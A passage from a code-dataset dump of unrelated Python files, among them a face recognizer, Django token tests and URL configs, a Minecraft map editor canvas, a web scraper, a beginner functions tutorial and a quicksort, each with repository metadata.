processing = img[:,:, ::-1]\n if i == 1:\n face_locations = face_recognition.face_locations(processing)\n face_encodings = face_recognition.face_encodings(processing, face_locations)\n face_names = deque()\n faces = zip(face_locations, face_encodings)\n for location, encoding in faces:\n matches = face_recognition.compare_faces(encodings, encoding)\n name = \"unknown\"\n if True in matches:\n index = matches.index(True)\n name = names[index]\n else:\n encodings.append(encoding)\n name = xfrreader.randomString()\n names.append(name)\n cropped = img[location[0] - 20:location[2] + 20, location[3] - 20:location[1] + 20]\n if cv2.imwrite(name + '.jpg', cropped) == True:\n xfrreader.writeFile(name, name + '.jpg')\n else:\n os.remove(name + '.jpg')\n face_names.append(name)\n\n if lastsent != face_names:\n lastsent = face_names\n sendToPlatform(face_names)\n\n rawCapture.truncate(0)\n i = i + 1\n if i == 3:\n i = 1\n\ncam.release()\nif send_platform:\n WD.disconnect()\n\n","sub_path":"pi/face-recognizer.py","file_name":"face-recognizer.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"559481374","text":"from airone.lib.test import AironeViewTest\n\nfrom rest_framework.authtoken.models import Token\n\nfrom user.models import User\nfrom django.contrib.auth.models import User as DjangoUser\n\n\nclass APITest(AironeViewTest):\n def test_create_token(self):\n admin = self.admin_login()\n\n resp = self.client.put('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertTrue('results' in resp.json())\n self.assertTrue(isinstance(resp.json()['results'], str))\n self.assertEqual(resp.json()['results'], str(Token.objects.get(user=admin)))\n\n def test_refresh_token(self):\n admin = self.admin_login()\n token = Token.objects.create(user=admin)\n\n resp = self.client.put('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertNotEqual(resp.json()['results'], str(token))\n\n def test_get_token(self):\n admin = self.admin_login()\n token = Token.objects.create(user=admin)\n\n resp = self.client.get('/api/v1/user/access_token')\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json()['results'], str(token))\n\n def test_refresh_token_using_token(self):\n # This processing doesn't login but just only create an User 'guest'\n user = User.objects.create(username='guest')\n token = Token.objects.create(user=DjangoUser.objects.get(id=user.id))\n\n resp = self.client.get('/api/v1/user/access_token', **{\n 'HTTP_AUTHORIZATION': 'Token %s' % str(token),\n })\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(resp.json()['results'], str(token))\n","sub_path":"api_v1/tests/user/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"103873321","text":"import wx\nfrom OpenGL.GL import *\nimport os\nfrom typing import TYPE_CHECKING, Optional, Any, Dict, Tuple, List, Generator, Union\nimport numpy\n\nimport minecraft_model_reader\nfrom amulet.api.chunk import Chunk\nfrom amulet.api.structure import Structure\nfrom amulet.api.errors import ChunkLoadError\nfrom amulet.api.data_types import PointCoordinatesNDArray\nfrom amulet.api.selection import SelectionGroup\n\nfrom amulet_map_editor.opengl.mesh.world_renderer.world import RenderWorld, cos, tan, atan\nfrom amulet_map_editor.opengl.mesh.selection import RenderSelection, RenderSelectionGroup\nfrom amulet_map_editor.opengl.mesh.structure import RenderStructure\nfrom amulet_map_editor.opengl import textureatlas\nfrom amulet_map_editor.opengl.canvas.base import BaseCanvas\nfrom amulet_map_editor import log\nfrom ..events import CameraMoveEvent\n\nif TYPE_CHECKING:\n from amulet.api.world import World\n\nMODE_NORMAL = 0 # normal selection\nMODE_DISABLED = 1 # non-interactive selection boxes\nMODE_STRUCTURE = 2 # MODE_DISABLED and draw structure if exists\n\n\nclass EditCanvas(BaseCanvas):\n def __init__(self, parent: wx.Window, world: 'World'):\n super().__init__(parent)\n self._last_mouse_x = 0\n self._last_mouse_y = 0\n self._mouse_delta_x = 0\n self._mouse_delta_y = 0\n self._mouse_lock = False\n self._mouse_moved = False\n\n # load the resource packs\n os.makedirs('resource_packs', exist_ok=True)\n if not os.path.isfile('resource_packs/readme.txt'):\n with open('resource_packs/readme.txt', 'w') as f:\n f.write('Put the Java resource pack you want loaded in here.')\n\n self._texture_bounds: Optional[Dict[Any, Tuple[float, float, float, float]]] = None\n self._resource_pack: Optional[minecraft_model_reader.JavaRPHandler] = None\n\n self._load_resource_pack(\n minecraft_model_reader.JavaRP(os.path.join(os.path.dirname(__file__), '..', 'amulet_resource_pack')),\n minecraft_model_reader.java_vanilla_latest,\n *[minecraft_model_reader.JavaRP(rp) for rp in os.listdir('resource_packs') if os.path.isdir(rp)],\n minecraft_model_reader.java_vanilla_fix\n )\n\n self._resource_pack_translator = world.world_wrapper.translation_manager.get_version('java', (1, 15, 2))\n\n self._render_world = RenderWorld(\n self.context_identifier,\n world,\n self._resource_pack,\n self._gl_texture_atlas,\n self._texture_bounds,\n self._resource_pack_translator\n )\n\n self._camera: List[float] = [0.0, 100.0, 0.0, 45.0, 45.0]\n self._projection = [70.0, 4 / 3, 0.1, 1000.0]\n self._camera_move_speed = 2\n self._camera_rotate_speed = 2\n self._select_distance = 10\n self._select_distance2 = 10\n self._select_mode = MODE_NORMAL\n\n self._selection_group = RenderSelectionGroup(\n self.context_identifier,\n self._texture_bounds,\n self._gl_texture_atlas\n )\n self._structure: Optional[RenderStructure] = None\n self._structure_locations: List[numpy.ndarray] = []\n\n self._draw_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self._on_draw, self._draw_timer)\n\n self._gc_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self._gc, self._gc_timer)\n\n self._rebuild_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self._rebuild, self._rebuild_timer)\n\n @property\n def selection_group(self) -> SelectionGroup:\n return self._selection_group.create_selection_group()\n\n @property\n def active_selection(self) -> Optional[RenderSelection]:\n return self._selection_group.active_selection\n\n def enable(self):\n self.SetCurrent(self._context)\n self._render_world.enable()\n self._draw_timer.Start(33)\n self._gc_timer.Start(10000)\n self._rebuild_timer.Start(1000)\n\n def disable(self):\n self._draw_timer.Stop()\n self._gc_timer.Stop()\n self._rebuild_timer.Stop()\n self._render_world.disable()\n\n def disable_threads(self):\n self._render_world.chunk_generator.stop()\n\n def enable_threads(self):\n self._render_world.chunk_generator.start()\n\n def close(self):\n self._render_world.close()\n super()._close()\n\n def is_closeable(self):\n return self._render_world.is_closeable()\n\n def _load_resource_pack(self, *resource_packs: minecraft_model_reader.JavaRP):\n self._resource_pack = minecraft_model_reader.JavaRPHandler(resource_packs)\n self._create_atlas()\n\n def _create_atlas(self):\n texture_atlas, self._texture_bounds, width, height = textureatlas.create_atlas(\n self._resource_pack.textures\n )\n glBindTexture(GL_TEXTURE_2D, self._gl_texture_atlas)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width, height, 0, GL_RGBA, GL_UNSIGNED_BYTE, texture_atlas)\n glBindTexture(GL_TEXTURE_2D, 0)\n log.info('Finished setting up texture atlas in OpenGL')\n\n @property\n def structure(self) -> RenderStructure:\n return self._structure\n\n @structure.setter\n def structure(self, structure: Structure):\n self._structure = RenderStructure(\n self.context_identifier,\n structure,\n self._resource_pack,\n self._gl_texture_atlas,\n self._texture_bounds,\n self._resource_pack_translator\n )\n\n @property\n def structure_locations(self) -> List[numpy.ndarray]:\n return self._structure_locations\n\n @property\n def select_distance(self) -> int:\n return self._select_distance\n\n @select_distance.setter\n def select_distance(self, distance: int):\n self._select_distance = distance\n self._change_box_location()\n\n @property\n def select_distance2(self) -> int:\n return self._select_distance2\n\n @select_distance2.setter\n def select_distance2(self, distance: int):\n self._select_distance2 = distance\n self._change_box_location()\n\n @property\n def select_mode(self) -> int:\n return self._select_mode\n\n @select_mode.setter\n def select_mode(self, select_mode: int):\n self._select_mode = select_mode\n\n @property\n def dimension(self) -> str:\n return self._render_world.dimension\n\n @dimension.setter\n def dimension(self, dimension: int):\n self._render_world.dimension = dimension\n\n @property\n def camera_location(self) -> Tuple[float, float, float]:\n return tuple(self._camera[:3])\n\n @camera_location.setter\n def camera_location(self, location: Tuple[Union[int, float], Union[int, float], Union[int, float]]):\n self._camera[:3] = location\n self._transformation_matrix = None\n self._change_box_location()\n wx.PostEvent(self, CameraMoveEvent(x=self._camera[0], y=self._camera[1], z=self._camera[2], rx=self._camera[3], ry=self._camera[4]))\n\n @property\n def camera_move_speed(self) -> float:\n \"\"\"The speed that the camera moves at\"\"\"\n return self._camera_move_speed\n\n @camera_move_speed.setter\n def camera_move_speed(self, val: float):\n self._camera_move_speed = val\n\n @property\n def camera_rotate_speed(self) -> float:\n \"\"\"The speed that the camera rotates at\"\"\"\n return self._camera_rotate_speed\n\n @camera_rotate_speed.setter\n def camera_rotate_speed(self, val: float):\n self._camera_rotate_speed = val\n\n @property\n def fov(self) -> float:\n return self._projection[0]\n\n @fov.setter\n def fov(self, fov: float):\n self._projection[0] = fov\n self._transformation_matrix = None\n\n @property\n def aspect_ratio(self) -> float:\n return self._projection[1]\n\n @aspect_ratio.setter\n def aspect_ratio(self, aspect_ratio: float):\n self._projection[1] = aspect_ratio\n self._transformation_matrix = None\n\n def _change_box_location(self):\n if self._selection_group.active_selection and self._selection_group.active_selection.being_resized:\n position, box_index = self._box_location_distance(self.select_distance2)\n elif self._mouse_lock:\n position, box_index = self._box_location_distance(self.select_distance)\n else:\n position, box_index = self._box_location_closest()\n\n self._selection_group.update_position(position, box_index)\n\n # if self._selection_box.select_state == 0:\n # (x, y, z) = self._selection_box.point1 = self._selection_box.point2 = location\n # wx.PostEvent(self, BoxGreenCornerChangeEvent(x=x, y=y, z=z))\n # wx.PostEvent(self, BoxBlueCornerChangeEvent(x=x, y=y, z=z))\n # elif self._selection_box.select_state == 1:\n # (x, y, z) = self._selection_box.point2 = location\n # wx.PostEvent(self, BoxBlueCornerChangeEvent(x=x, y=y, z=z))\n # elif self._selection_box.select_state == 2:\n # self._selection_box2.point1 = self._selection_box2.point2 = location\n\n def ray_collision(self):\n vector_start = self.camera_location\n direction_vector = self._look_vector()\n min_point = self.active_selection.min\n max_point = self.active_selection.max\n\n point_array = max_point.copy()\n numpy.putmask(point_array, direction_vector > 0, min_point)\n\n t = (point_array - vector_start) / direction_vector\n\n t_max = numpy.where(t == t.max())[0][0]\n return t_max\n\n def _box_location_closest(self) -> Tuple[PointCoordinatesNDArray, Optional[int]]:\n \"\"\"Find the location of the closests non-air block or selection box\"\"\"\n cx: Optional[int] = None\n cz: Optional[int] = None\n chunk: Optional[Chunk] = None\n\n box_index, nearest_selection_box = self._selection_group.closest_intersection(self.camera_location, self._look_vector())\n\n location = numpy.array([0, 0, 0], dtype=numpy.int32)\n for location in self._collision_locations():\n if nearest_selection_box and nearest_selection_box.in_boundary(location):\n return location, box_index\n\n x, y, z = location\n cx_ = x >> 4\n cz_ = z >> 4\n if cx is None or cx != cx_ or cz != cz_:\n cx = cx_\n cz = cz_\n try:\n chunk = self._render_world.world.get_chunk(cx, cz, self.dimension)\n except ChunkLoadError:\n chunk = None\n\n if chunk is not None and self._render_world.world.palette[chunk.blocks[x % 16, y, z % 16]].namespaced_name != 'universal_minecraft:air':\n return location, None\n return location, None\n\n def _box_location_distance(self, distance: int) -> Tuple[PointCoordinatesNDArray, Optional[int]]:\n \"\"\"\n The first block location along the camera's look vector that is further away than `distance`.\n :param distance: The distance between the block and the camera.\n :return: (x, y, z) numpy array, selection box index\n \"\"\"\n look_vector = self._look_vector()\n position = numpy.array(self.camera_location, dtype=numpy.int) + numpy.floor(look_vector*distance).astype(numpy.int)\n box = next((index for index, box in enumerate(self._selection_group) if box.in_boundary(position)), None)\n return position, box\n\n def _look_vector(self) -> numpy.ndarray:\n \"\"\"\n The x,y,z vector for the direction the camera is facing\n :return: (x, y, z) numpy float array ranging from -1 to 1\n \"\"\"\n look_vector = numpy.array([0, 0, -1, 0])\n if not self._mouse_lock:\n screen_x, screen_y = numpy.array(self.GetSize(), numpy.int) / 2\n screen_dx = atan(self.aspect_ratio * tan(self.fov / 2) * self._mouse_delta_x / screen_x)\n screen_dy = atan(cos(screen_dx) * tan(self.fov / 2) * self._mouse_delta_y / screen_y)\n look_vector = numpy.matmul(self.rotation_matrix(screen_dy, screen_dx), look_vector)\n look_vector = numpy.matmul(self.rotation_matrix(*self._camera[3:5]), look_vector)[:3]\n look_vector[abs(look_vector) < 0.000001] = 0.000001\n return look_vector\n\n def _collision_locations(self, max_distance=100) -> Generator[numpy.ndarray, None, None]:\n \"\"\"\n The block locations that the camera's look vector passes through.\n :param max_distance: The maximum distance along the look vector to traverse.\n :return: A generator of (x, y, z) numpy arrays\n \"\"\"\n # TODO: optimise this\n\n look_vector = self._look_vector()\n dx, dy, dz = look_vector\n\n vectors = numpy.array(\n [\n look_vector / abs(dx),\n look_vector / abs(dy),\n look_vector / abs(dz)\n ]\n )\n offsets = -numpy.eye(3)\n\n locations = set()\n start: numpy.ndarray = numpy.array(self.camera_location, numpy.float32) % 1\n\n for axis in range(3):\n location: numpy.ndarray = start.copy()\n vector = vectors[axis]\n offset = offsets[axis]\n if vector[axis] > 0:\n location = location + vector * (1 - location[axis])\n else:\n location = location + vector * location[axis]\n while numpy.all(abs(location) < max_distance):\n locations.add(tuple(numpy.floor(location).astype(numpy.int)))\n locations.add(tuple(numpy.floor(location + offset).astype(numpy.int)))\n location += vector\n if locations:\n collision_locations = numpy.array(\n sorted(list(locations), key=lambda loc: sum(abs(loc_) for loc_ in loc))\n ) + numpy.floor(self.camera_location).astype(numpy.int)\n else:\n collision_locations = start.astype(numpy.int)\n\n for location in collision_locations:\n yield location\n\n def set_size(self, width, height):\n glViewport(0, 0, width, height)\n if height > 0:\n self.aspect_ratio = width / height\n else:\n self.aspect_ratio = 1\n self.DoSetSize(0, 0, width, height, 0) # I don't know if this is how you are supposed to do this\n\n def _on_draw(self, event):\n self.draw()\n event.Skip()\n\n def draw(self):\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n self._render_world.draw(self.transformation_matrix)\n if self._select_mode == MODE_STRUCTURE and self._structure is not None:\n transform = numpy.eye(4, dtype=numpy.float32)\n for location in self.structure_locations:\n transform[3, 0:3] = location\n self._structure.draw(numpy.matmul(transform, self.transformation_matrix), 0, 0)\n self._selection_group.draw(self.transformation_matrix, self._select_mode == MODE_NORMAL, tuple(self.camera_location))\n self.SwapBuffers()\n\n def _gc(self, event):\n self._render_world.run_garbage_collector()\n event.Skip()\n\n def _rebuild(self, evt):\n self._render_world.chunk_manager.rebuild()\n evt.Skip()\n","sub_path":"amulet_map_editor/programs/edit/canvas/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":15208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"462072004","text":"from django.conf.urls import patterns, url\n\nurlpatterns = patterns('timeline.views',\n url(r'^$', 'index', name='index'),\n url(r'^user/(?P\\d+)/$', 'user_timeline', name='user_timeline'),\n url(r'^new/$', 'new', name='new'),\n url(r'^post/(?P\\d+)/$', 'post_detail', name='post_detail'),\n url(r'^post/(?P\\d+)/like/$', 'post_like', name='post_like'),\n url(r'^post/(?P\\d+)/unlike/$', 'post_unlike', name='post_unlike'),\n url(r'^post/(?P\\d+)/comment/new/$', 'comment_form', name='comment_new'),\n url(r'^post/(?P\\d+)/comment/(?P\\d+)/new/$', 'comment_form', name='comment_edit'),\n url(r'^post/(?P\\d+)/comment/(?P\\d+)/delete/$', 'comment_delete', name='comment_delete'),\n)\n","sub_path":"timeline/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"281335891","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n# @File Name: scrape.py\n# @Created: 2017-09-19 04:25:27 seo (simon.seo@nyu.edu) \n\nfrom urllib import request\nimport csv\nfrom bs4 import BeautifulSoup as bs\n\ndef main():\n\t# url = input(\"The URL of the data: \")\n\turl = \"http://i6.cims.nyu.edu/~ms9144/external/Species_All.htm\"\n\tpage = download(url)\n\n\t# csv_name = input('Name of the output csv file: ')\n\tdataname = 'endangered_species'\n\tparsed = parse(page, dataname + '.csv')\n\tstates = \"AL,AK,AZ,AR,CA,CO,CT,DE,FL,GA,HI,ID,IL,IN,IA,KS,KY,LA,ME,MD,MA,MI,MN,MS,MO,MT,NE,NV,NH,NJ,NM,NY,NC,ND,OH,OK,OR,PA,RI,SC,SD,TN,TX,UT,VT,VA,WA,WV,WI,WY\".split(',')\n\tfor i in range(len(states)):\n\t\tstates.insert(i*2, 'CurrentDistribution')\n\tprint(states)\n\tfilter(parsed, dataname + '_filtered.csv', 'Regions ofOccurrence', '5', *states)\n\ndef download(url):\n\t'''Downloads and returns a webpage'''\n\ttry:\n\t\tprint(\"Attempting download of the page.\")\n\t\tpage = request.urlopen(url).read()\n\texcept Exception as e:\n\t\tprint(\"Invalid page or failed connection.\")\n\t\traise e\n\telse:\n\t\tprint(\"Download successful. Parsing page.\")\n\treturn page\n\ndef parse(page, output_name):\n\t'''Parses the given webpage and saves table data in the output file'''\n\tsoup = bs(page, \"html.parser\")\n\tcsv_file = open(output_name, 'w')\n\twriter = csv.writer(csv_file, delimiter=',')\n\n\ttrs = soup.find_all('tr')\n\n\t# Save the header (only the ones that we require)\n\theader = []\n\treq = \"Scientific Name,Common Name,CurrentDistribution,Family,Species Group,Federal Listing Status,Regions ofOccurrence,Vertebrate/Invertebrate/Plant\"\n\treq = req.split(',')\n\ti = 0\n\treq_idx = [] # index of the header fields that we require\n\tfor field in trs[0]:\n\t\tfield = field.text.strip()\n\t\tif field in req:\n\t\t\theader.append(field)\n\t\t\treq_idx.append(i)\n\t\ti += 1\n\twriter.writerow(header)\n\n\t# Save the data rows\n\tfor tr in trs[1:]:\n\t\ttds = tr.find_all('td')\n\t\t# print(\": {}, \".join([h.text for h in header]).format(*[td.text.strip() for td in tds]))\n\t\trow = []\n\t\ti = 0\n\t\tfor td in tds:\n\t\t\tif i in req_idx:\n\t\t\t\tdata = td.text.strip()\n\t\t\t\tdata = 'N/A' if data in ['NA', '', 'No common name'] else data # unify expressions\n\t\t\t\trow.append(data)\n\t\t\ti += 1\n\t\twriter.writerow(row)\n\tcsv_file.close()\n\n\tprint(\"Page parsed and the data was saved in {}\".format(output_name))\n\treturn output_name\n\ndef filter(input_name, output_name, *args):\n\t'''Add new fields that checks if each datarow satisfy a condition'''\n\n\t# Create CSV reader and writer\n\ttry:\n\t\tcsv_in = open(input_name, 'r')\n\texcept Exception as e:\n\t\tprint('Check if unfiltered file exists.')\n\t\traise e\n\telse:\n\t\tprint('Checking for some filters')\n\treader = csv.reader(csv_in, delimiter=',')\n\tcsv_out = open(output_name, 'w')\n\twriter = csv.writer(csv_out, delimiter=',')\n\n\t# save the filter conditions and update header with the conditions\n\tfilters = []\n\theader = next(reader)\n\tfor i in range(0, len(args), 2):\n\t\theader.append('{1} in {0}'.format(args[i], args[i+1]))\n\t\tfilters.append((args[i], args[i+1]))\n\twriter.writerow(header)\n\n\t# for each species check whether conditions satisifies\n\tfor row in reader:\n\t\tfor filter_field, keyword in filters:\n\t\t\tfor i in range(len(row)):\n\t\t\t\tif header[i] == filter_field:\n\t\t\t\t\trow.append(keyword in row[i])\n\t\twriter.writerow(row)\n\n\tcsv_in.close()\n\tcsv_out.close()\n\tprint('All filter conditions were checked and the data was saved in {}.'.format(output_name))\n\n\nmain()\n","sub_path":"HW2_scrub/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"578238566","text":"## FUNCTION\n#def namaFunction (): --> cara bikin function\n# program \n\n##contoh\ndef hello(): \n print ('hello world!')\n#hello() ##memanggil function\n##\ndef pangkat (x,y): ## deklarasi parameter bebas\n print (x**y)\n#pangkat (2,4)\n#pangkat (\n# float(input ('Ketik angka pertama: ')), \n# float (input ('Ketik angka kedua: '))\n#)#memanggil fungsi dengan parameternya input\n##soal: buat sebuah function 1 parameter, dimana function tersebut fungsinya untuk menentukan apakah value paramter tersebut ganjil/genap\ndef gangen (x):\n if (x%2==0):\n print (f'{x} adalah angka genap')\n elif (x%2>0): \n print (f'{x} adalah angka ganjil')\n#gangen (round(float(input ('Masukan angka: '))))\n## sebuah function, ketika dijalankan akan muncul di terminal: masukan angka 1, masukan operator aritmatika:, masukan angka 2:\ndef calc():\n angka1 = float(input('Masukan angka 1: '))\n angka2 = float (input('Masukan angka 2: '))\n operator = (input ('Masukan operator (+, -, *, /, **): '))\n if operator=='+':\n print (angka1 + angka2)\n elif operator =='-':\n print (angka1 - angka2)\n elif operator == '*':\n print (angka1 * angka2)\n elif operator=='/':\n print (angka1 / angka2)\n elif operator=='**':\n print (angka1 ** angka2)\n else:\n print (f'operator {operator} tidak terdaftar')\n#calc ()\nstudents=['Andi', 'Budi', 'Caca']\ndef tes (x):\n print(x[1])\n print ('Caca' in x)\n#tes (students)\n## function yang mengubah semua huruf vokal menjadi huruf 'o'\ndef vocal():\n kata=input('masukan kata/kalimat: ')\n huruf=input('masukan huruf vokal tujuan: ')\n kata2= kata.replace('a', huruf).replace('i', huruf).replace('e', huruf).replace('u', huruf).replace('o', huruf).replace('A', huruf.upper()).replace('I', huruf.upper()).replace('E', huruf.upper()).replace('U', huruf.upper()).replace('O', huruf.upper())\n print (kata2)\nvocal()\n### RETURN FUNCTION ###\n## Return function: ada value nya \ndef LuasPersegiReturn (sisi):\n return sisi*sisi ## memasukan fungsi dalam variabel\n#print (LuasPersegiReturn(4))\nluas=LuasPersegiReturn (5) ## misal: nilai LuasPersegiReturn tersebut dimauskan ke dalam variabel\ndef genap (x):\n if x%2 == 0:\n return True\n else: \n return False\n#print (genap (9)) \n","sub_path":"Day6b.py","file_name":"Day6b.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"69533460","text":"#!/usr/bin/env python3\n# Copyright 2017 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A demo of the Google CloudSpeech recognizer.\"\"\"\n\nimport aiy.audio\nimport aiy.cloudspeech\nimport aiy.i18n\n\nimport mod.snowboydecoder as snowboydecoder\nimport mod.detect_intent_stream as detect_intent_stream\n\nimport os\nimport sys\nimport uuid\n\naiy.i18n.set_language_code('ja-JP')\n\nif len(sys.argv) == 1:\n print(\"Error: need to specify model name\")\n print(\"Usage: python demo.py your.model\")\n sys.exit(-1)\n\nmodel = sys.argv[1]\n\ndef callbacks():\n #snowboydecoder.play_audio_file(snowboydecoder.DETECT_DING)\n global interrupted\n interrupted = True\n\ndef interrupt_callback():\n global interrupted\n return interrupted\n\ndef main():\n detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)\n aiy.audio.get_recorder().start()\n dialogflow = detect_intent_stream.get_recognizer()\n\n while True:\n print('INFO:Speak Wake Word and speak')\n\n global interrupted\n interrupted = False\n\n detector.start(detected_callback=callbacks,\n interrupt_check=interrupt_callback,\n sleep_time=0.03)\n\n print('INFO:Listening...')\n text = dialogflow.recognize(str(uuid.uuid4())).fulfillment_text\n\n if not text:\n print('INFO:Sorry, I did not hear you.')\n else:\n print('INFO:\"', text, '\"')\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"dialogflow_audio_demo.py","file_name":"dialogflow_audio_demo.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635968293","text":"def quickSort(array,start,ends):\r\n if start>=ends:\r\n return\r\n part=Partition(array,start,ends)\r\n quickSort(array,start,part-1)\r\n quickSort(array,part+1,ends)\r\n\r\ndef Partition(array,start,ends):\r\n pivot=array[ends]\r\n index=start\r\n for i in range(start,len(array)-1):\r\n if array[i][0-9]+)/reviews',\n ReviewViewSet,\n basename='reviews'\n)\nv1_router.register(\n 'titles/(?P[0-9]+)/reviews/(?P[0-9]+)/comments',\n CommentViewSet,\n basename='comments'\n)\n\nurlpatterns = [\n path('v1/', include(v1_router.urls)),\n path('v1/auth/', include('yamdb_auth.urls')),\n path('v1/users/', include('users.urls')),\n]\n","sub_path":"yamdb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"555225290","text":"# !/usr/bin/env python\n\nimport unittest as unittest\n\nimport chart\n\n\nclass TestProcessor(unittest.TestCase):\n\n def test_multiple_hosts_multiple_runs(self):\n expected = \"x:'x', \" \\\n \"columns:[\" \\\n \"['x', 500, 1000]\" \\\n \",['load-throughput', 1748.5974, 1716.7574]\" \\\n \",['wla-throughput', 2091.4185, 2124.3818]\" \\\n \"]\"\n\n source_files = \"test/data/big_run\"\n c = chart.throughput(source_files)\n self.assertEqual(expected, c)\n\n def test_should_handle_missing_files_without_skewing_data(self):\n expected = \"x:'x', \" \\\n \"columns:[\" \\\n \"['x', 500, 1000]\" \\\n \",['load-throughput', 1798.9889, 0]\" \\\n \",['wla-throughput', 2049.0405, 2233.0913]\" \\\n \"]\"\n source_files = \"test/data/incomplete_run_different_hosts\"\n self.assertEqual(expected, chart.throughput(source_files))\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()","sub_path":"fabfile/charts/test/chart_acceptance_test.py","file_name":"chart_acceptance_test.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30016916","text":"from cuz.books.models import ConversionHistory\nfrom cuz.books.tasks.converter import Converter, VERSIONS, FINAL, TASK_ID_FIELDS\nfrom cuz.core import tasks\nfrom cuz.core.tasks import PROCESSING, STOPPED\n\n\ndef convert(user, book, version, email=True):\n # prepare\n if not book.layout:\n raise Exception(\"book is missing a layout\")\n if version not in VERSIONS:\n raise Exception(\"invalid version %s\" % version)\n task_id = getattr(book, TASK_ID_FIELDS[version])\n stop(task_id)\n\n # convert\n converter = Converter()\n result = converter.delay(user.id, book.id, version, book.layout.lower(), email)\n setattr(book, TASK_ID_FIELDS[version], result.task_id)\n book.save()\n\n return result.task_id\n\n\ndef stop(task_id):\n if task_id:\n audit = ConversionHistory.objects.filter(task_id=task_id).first()\n if audit and audit.status == PROCESSING:\n # stop conversion\n tasks.revoke(task_id)\n audit.status = STOPPED\n audit.save()\n\n # update book\n if audit.version == FINAL:\n audit.book.converted_final_snapshot = ''\n setattr(audit.book, TASK_ID_FIELDS[audit.version], None)\n audit.book.save()\n","sub_path":"Latex/sources/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"118768745","text":"T = int(input())\nMOD = 10 ** 9 + 7\n\ndef check(n, a, b):\n if a + b > n:\n return 0\n\n blue = (n - a + 1) ** 2 % MOD\n red = (n - b + 1) ** 2 % MOD\n ans = blue * red % MOD\n \n X4 = (n - a - b + 2) * (n - a - b + 1) // 2\n X3 = 2 * X4\n X2 = (n - a + 1) * (n - b + 1) - X3\n X1 = X2 ** 2 % MOD\n ans -= X1\n ans %= MOD\n \n return ans\n\nfor _ in range(T):\n N, A, B = map(int, input().split())\n print(check(N, A, B))\n","sub_path":"atcoder/2020/Other/1010_HHKB2020/D_cheat.py","file_name":"D_cheat.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"614561928","text":"#!/usr/bin/env python3\n'''\nv1.1:\n - that version creates IB list and output file (tab \"Detailed Inventory\") containing duplicate SNs, no SN items excluded\n - creates tab \"EoS Report\" and lists SNs with EoS Flag set to \"Y\"\n - creates \"SN to PN double mapping\" tab that lists lines that have different Material Ids (PNs) associated with same SN\n'''\n \nimport openpyxl\nimport sys\n \ndef main():\n \n try:\n in_file = sys.argv[1]\n out_file = sys.argv[2]\n except IndexError: \n print('\\nRun the script with input and output files:\\n\\t\\t\\tIB_validation.py .xlsx .xlsx\\n\\n')\n else: \n workbook = in_file\n sheetName = 'Detailed Inventory'\n sheet = openpyxl.load_workbook(workbook)[sheetName]\n wb = sheet['A:AU']\n \n # exceptions_no_SN list lists PNs that have no SN such as power modules, fans, sw licenses etc\n exceptions_no_SN = ['ACX4000BASE-DC', 'CHAS-ACX4000-S', 'JUNOS-WW', 'JUNOS-WW-BB', 'JUNOS-64', 'JUNOS-LTD-64',\n 'JUNOS-WW-64', 'FANTRAY-MX80-BB', 'FFILTER-MX960-HC-BB', 'CBL-JX-PWR-EU', 'FFILTER-MX960-BB',\n 'FFANTRAY-MX480-HC-BB', 'CBL-M-PWR-RA-EU', 'CBL-PWR-10AC-STR-EU', 'S-MX80-Q', 'S-MPC-3D-VQ', 'MX2K-CBL-BTM-BB',\n 'JS-IPv6', 'S-MPC-3D-VQ-ADV-R', 'S-MPC-3D-PQ-ADV-R', 'S-SSM-FP', 'S-MX80-ADV-R', 'CBL-PWR-C15M-HITEMP-EU', 'CBL-M-PWR-RA-US',\n 'S-ACCT-JFLOW-IN', 'S-MPC3E-3D-ADV-R', 'S-SA-64K', 'S-SA-FP', 